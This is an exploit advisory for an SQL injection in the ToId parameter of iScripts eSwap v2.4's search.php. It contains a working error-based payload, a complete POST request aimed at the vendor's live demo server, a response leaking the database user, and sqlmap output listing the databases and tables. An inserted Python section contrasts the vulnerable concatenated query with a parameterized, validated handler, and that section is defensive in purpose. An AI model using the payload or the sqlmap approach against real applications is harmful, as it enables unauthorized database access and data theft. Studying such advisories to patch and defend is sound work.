
Exploit title: iScripts eSwap v2.4 - SQL injection via the search.php User Panel

Date: 23/05/2018

Exploit Author: Keyone

Vendor Homepage: https://www.iscripts.com

Software Link: https://www.iscripts.com/eswap

Demo Link: https://www.demo.iscripts.com/eswap/demo//index.php

Version: 2.4

Tested on: Windows 7

Category: Webapps

CVE:


Description


iScripts eSwap v2.4 is vulnerable to SQL injection through the "ToId" parameter of search.php in the User Panel. The value is used in a database query without sanitization or parameter binding, and the resulting MySQL error text is echoed into the page, which allows error-based extraction (updatexml) as shown below.

PoC: 'ToId' parameter
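The following is an added example, not code from the advisory or from the eSwap product. It reconstructs, as a hypothetical, the query-building pattern that makes a parameter like ToId injectable, and places it beside the parameterized and validated handler a defender would write instead. It uses an in-memory SQLite database with a constructed table; the eSwap schema and MySQL's updatexml()/user() functions are not reproduced, so the only payload used is the ToId value from the PoC request. The point it makes beyond the advisory text: in the concatenated version the engine actually tries to evaluate the injected expression (SQLite reports an unknown function where MySQL reported the XPATH syntax error), while the bound version treats the same string as data and matches nothing, and the handler never returns engine error text to the client.

```python
import re
import sqlite3

# ToId value from the advisory's PoC request, URL-decoded.
POC_TOID = "1' and (select updatexml(1,concat(0x2b,user()),1)) and '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's user table (not the eSwap schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE eswapusers (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO eswapusers VALUES (?, ?)",
                     [(1, "alice"), (2, "bob")])
    return conn


def lookup_concat(conn: sqlite3.Connection, to_id: str) -> list:
    """Vulnerable pattern (hypothetical reconstruction of what search.php does):
    the request value is spliced into the SQL text, so the engine parses and
    evaluates whatever expression the client supplied."""
    sql = "SELECT name FROM eswapusers WHERE id = '" + to_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn: sqlite3.Connection, to_id) -> list:
    """Hardened pattern: a placeholder with a bound value. The value reaches the
    engine as data and cannot change the statement's structure."""
    sql = "SELECT name FROM eswapusers WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (to_id,))]


def run_concat(conn: sqlite3.Connection, to_id: str) -> tuple:
    """Run the vulnerable lookup and report either rows or the engine's error text.
    With the PoC value the engine tries to call updatexml()/user(): MySQL answers
    with the 'XPATH syntax error' that leaked the DB user in the advisory, SQLite
    with 'no such function'. Either way the injected expression was executed."""
    try:
        return ("rows", lookup_concat(conn, to_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


# ToId is a numeric id: accept only a short run of digits with no leading zero.
_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def handle_request(conn: sqlite3.Connection, form: dict) -> dict:
    """Request handler as a defender would write it: validate the shape of ToId,
    bind it as a parameter, and never echo database error text to the client
    (the echo is what turned this bug into a direct data leak)."""
    raw = form.get("ToId", "")
    if not _ID_RE.fullmatch(raw):
        return {"status": 400, "names": []}
    try:
        return {"status": 200, "names": lookup_param(conn, int(raw))}
    except sqlite3.Error:
        # Log the exception server-side; the client only sees a generic failure.
        return {"status": 500, "names": []}


if __name__ == "__main__":
    db = make_db()
    print("concat, benign:", run_concat(db, "1"))
    print("concat, PoC:   ", run_concat(db, POC_TOID))
    print("bound,  PoC:   ", lookup_param(db, POC_TOID))
    print("handler, PoC:  ", handle_request(db, {"ToId": POC_TOID}))
```

The validation step is a second, independent layer: even without it the bound query is not injectable, but rejecting anything that is not a plausible id keeps junk out of the logs and the database entirely.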


Request:

POST /eswap/demo/search.php HTTP/1.1
Host: www.demo.iscripts.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=csv8f9jgmjl6sh1spblmikbra0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

btnGo=Send Message&btnSubAdd=1&qyery=txtHomeSearch=1&ToId=1' and (select updatexml(1,concat(0x2b,user()),1)) and '1'='1&txtMsg=1&txtMsg11=1&txtTitle=1&txtTitle11=Mr.

Response:

HTTP/1.1 200 OK
Date: Wed, 23 May 2018 01:56:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23892
...
</td>
    </tr>
</table>XPATH syntax error: '+productd_dmouser@localhost'

sqlmap:

[10:04:27] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[10:04:27] [INFO] fetching database names
[10:04:30] [INFO] used SQL query returns 2 entries
[10:04:31] [INFO] retrieved: information_schema
[10:04:31] [INFO] retrieved: productd_eswapdemo
available databases [2]:
[*] information_schema
[*] productd_eswapdemo
Database: productd_eswapdemo
[62 tables]
+---------------------------------+
| eswap_sliders                   |
| eswapaffiliate                  |
| eswapbanners                    |
| eswapbanners_lang               |
| eswapbatches                    |
| eswapcashtxn                    |
| eswapcategory                   |
| eswapcategory_lang              |
| eswapchat                       |
| eswapclient_module_category     |
| eswapcontent                    |
| eswapcontent_lang               |
| eswapcounteroffer               |
| eswapcreditpayments             |
| eswapescrowrangefee             |
| eswapfaq                        |
| eswapfaq_lang                   |
| eswapgallery                    |
| eswaphelp                       |
| eswaphelp_lang                  |
| eswaphelpcategory               |
| eswaphelpcategory_lang          |
| eswaplang                       |
| eswaplistingfee                 |
| eswaplookup                     |
| eswapmandatory                  |
| eswapmessages                   |
| eswapmetatags                   |
| eswapmetatags_lang              |
| eswaponline                     |
| eswappayment                    |
| eswappaymentdetails             |
| eswappins                       |
| eswapplan                       |
| eswapplan_lang                  |
| eswappointhistory               |
| eswapreferrals                  |
| eswapsale                       |
| eswapsaledetails                |
| eswapsaleextra                  |
| eswapsaleinter                  |
| eswapsaletemp                   |
| eswapsliders                    |
| eswapsmilies                    |
| eswapsuccessfee                 |
| eswapsuccesstransactionpayments |
| eswapsurveyquestions            |
| eswapswap                       |
| eswapswapinter                  |
| eswapswapreturn                 |
| eswapswaptemp                   |
| eswapswaptxn                    |
| eswapswaptxn_old                |
| eswaptempdata                   |
| eswapuser_devices               |
| eswapuser_referral              |
| eswapuser_sliders               |
| eswapusercredits                |
| eswapuserfeedback               |
| eswapusers                      |
| eswapusersinter                 |
| eswapuserstemp                  |
+---------------------------------+